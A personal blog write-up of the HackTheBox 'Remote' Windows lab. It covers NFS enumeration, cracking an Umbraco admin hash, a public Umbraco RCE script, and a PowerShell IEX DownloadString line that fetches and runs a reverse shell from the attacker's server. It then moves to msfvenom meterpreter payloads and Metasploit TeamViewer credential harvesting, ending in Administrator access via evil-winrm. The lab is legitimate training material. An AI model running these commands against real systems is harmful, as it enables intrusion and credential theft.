Categories
HackTheBox Writeups

[HTB] – Remote

Hey ! Today's writeup is on Remote, an Easy Windows Box released on March 21st 2020 on HackTheBox.

If you have VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/234

It was my first Windows box. It's been quite some time now that I wanted to do one, but it isn't easy to start from scratch. Indeed, Windows and Linux boxes aren't the same at all. While when starting Linux boxes I had experience with the Linux terminal, I had none with the Windows Powershell. Therefore, I struggled to get this box done, but now I did, and I am very happy to present to you my writeup of it.

Recon

Like always, I performed a Nmap scan

nmap -A -p- -T4 10.10.10.180

I am using the same flags as always :

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

Here are the scan results :

Nmap scan report for 10.10.10.180
Host is up (0.089s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/29%OT=21%CT=1%CU=43315%PV=Y%DS=2%DC=T%G=Y%TM=5EFA427
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m20s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-29T19:38:43
|_  start_date: N/A

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   88.03 ms 10.10.14.1
2   87.58 ms 10.10.10.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.54 seconds

Own user

After taking a close look a the result file, I noticed NFS files. NFS is a protocol that allows hosts to access files on a remote server. Keep in mind that Nmap is a very powerfull tool, that has many scripts to check all sorts of things. For example by doing

nmap --script=nfs-showmount 10.10.10.180

you are checking for NFS mounting points. Here we get site_backup. It's a promising lead. All I had to do is mount it :

$ mkdir mnt
$ sudo mount 10.10.10.180:/site_backups mnt

After some enumeration by hand on the mounted folder, I found an .sdf file : App_Data/Umbraco.sdf. SFD files are compact databases saved in SQL CE Format (SQL Server Compact Format). It's a perfect place to find credentials.

Just before we take a look at it, the exploration of the website didn't seem to lead anywhere at first (I skipped directory busting, my mistake), but with this file, it is very likely that the website is based on the opensource CMS Umbraco, so I tried to navigate to : 10.10.10.180/Umbraco/. And Bingo !

I tried some basic SQL injections but without success, we will come back later with credentials.

Now back to our Umbraco.sdf. First thing I tried worked (a bit in a luck for once. 🙂

strings Umbraco.sdf | grep admin
[email protected]{"hashAlgorithm":"SHA1"}

We get a username, and a password hash.

Let's get the password corresponding to the hash with crackstation (https://crackstation.net/)

We can now use the credentials [email protected] and baconandcheese to login to the Umbraco CMS page.

There is a way to upload files, that could prove itself useful later, but not to own user. For that part, I found a python script that can get access using a Umbraco vulnerability, when provided with username/password. Here is the link to it : https://github.com/noraj/Umbraco-RCE

You can pass a PowerShell command as an argument. To try it out, just pass "ls" or "dir".

$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "dir C:/users"            


    Directory: C:\users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/19/2020   3:12 PM                .NET v2.0                                                             
d-----        2/19/2020   3:12 PM                .NET v2.0 Classic                                                     
d-----        2/19/2020   3:12 PM                .NET v4.5                                                             
d-----        2/19/2020   3:12 PM                .NET v4.5 Classic                                                     
d-----         7/8/2020   2:57 AM                Administrator                                                         
d-----        2/19/2020   3:12 PM                Classic .NET AppPool                                                  
d-r---         7/8/2020   8:55 AM                Public

We could adjust the commands to printout the user flag, that is located in C:/users/Public/user.txt, or do something more fun, I hereby summon the reverse shell.

I used the mini-reverse.ps1 script. You can easily find it online, make sure to change your IP address to the one given by openvpn, and the port to the one you have forwarded. Then put it in a server folder, and start a little server :

$ mkdir server
$ cp mini-reverse.ps1 server/
$ cd server
$ sudo python -m http.server --bind  80

If you go to your web browser and type in , you should see a list of all files in your server folder, and the request should start piling up in your terminal.

Once the python server is up and running start listening on the port you chose, for me 8888.

nc -lvnp 8888

I explain a little VERY useful tip about Netcat based reverse shells in my "HackTheBox Beginner Guide", make sure to check it out if you're totally new to this, or even if not, to give me some advice 😉

Now that the server runs and Netcat is listening, just launch the reverse shell.

python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http:///mini-reverse.ps1')"

After a few seconds, a windows shell should pop up in the terminal you were listening with. If not check that your VPN is still running, that the request made to the server for mini-reverse.ps1 indicates 200, and that IPs and ports are the right ones. If everything is right, just kill everything and start over.

We just need to print the flag, and we're done for this part !

$ cd C:\users\Public
$ type user.txt

Own root

I found two ways to get root, one that depends on the access you have managed to establish, but is faster, and the other one that always works, but takes a bit longer to perform.

I'll show the second one in this writeup.

Just know that the other method is using the PowerUp.ps1 script to perform a ServiceAbuse to add an Administrator account to logging to with evil-winrm.

When looking at the processes running on the machine (by using ps), I noticed TeamViewer was running. As it is a graphical app, and Remote is a Easy box, it couldn't be running if it wasn't useful at some point.

I found a way to gather credentials in TeamViewer, through Metasploit. The only requirement is to acquire a meterpreter session. To do so I tried to get a reverse shell using the metasploit handler.

$ msfconsole
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

I first started the metasploitable framework, set the exploit to multi/handler and the payload to a TCP meterpreter reverse shell for windows 64bits.

You then need to specify your IP and port, and just start listening and your are good to go on this side.

msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > set LHOST 
LHOST => 

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.94:8888

The second part is to get the remote host to execute your reverse shell. I first tried the same method than before with the python script, but you then get a message that a meterpreter session was opened, but you will not get the prompt back. And that is because the multi/handler actually needs to have a sort of Trojan executed on the machine.

Luckily for us, that isn't hard with msfvenom (a complimentary tool to metasploit).

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8888 -f exe > privesc.exe

This will generate a Windows executable file, that we need to upload on the target machine. Told you that Umbraco file upload page was going to come in handy 😉

Go to media, and import the privesc.exe file. Then find where your file is. It is in one of the subdirectories in C:/inetpub/wwwroot/Media/.

$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "C:/inetpub/wwwroot/Media/1035/privesc.exe"

Great ! We now have our meterpreter session !

[*] Started reverse TCP handler on 10.10.15.48:8888 
[*] Sending stage (201283 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.15.48:8888 -> 10.10.10.180:49759) at 2020-07-08 16:11:42 +0200

meterpreter >

To run the tool I spoke about, juste type the following command in meterpreter :

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/leo/.msf4/loot/20200708162410_default_10.10.10.180_host.teamviewer__598662.txt

We got our self a password 🙂

Let's see if it the admin password we are looking for. To connect to a windows machine with credentials, evil-winrm is a great tool. You can find it here : https://github.com/Hackplayers/evil-winrm

Here it how it's used :

$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'                                                                      

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/users/Administrator/Desktop/root.txt
69ee6ac83f153675310f9894b92e1ca2

That's it for this writeup ! I hope you enjoyed, and see you for another one !

Leave a Reply

Your email address will not be published. Required fields are marked *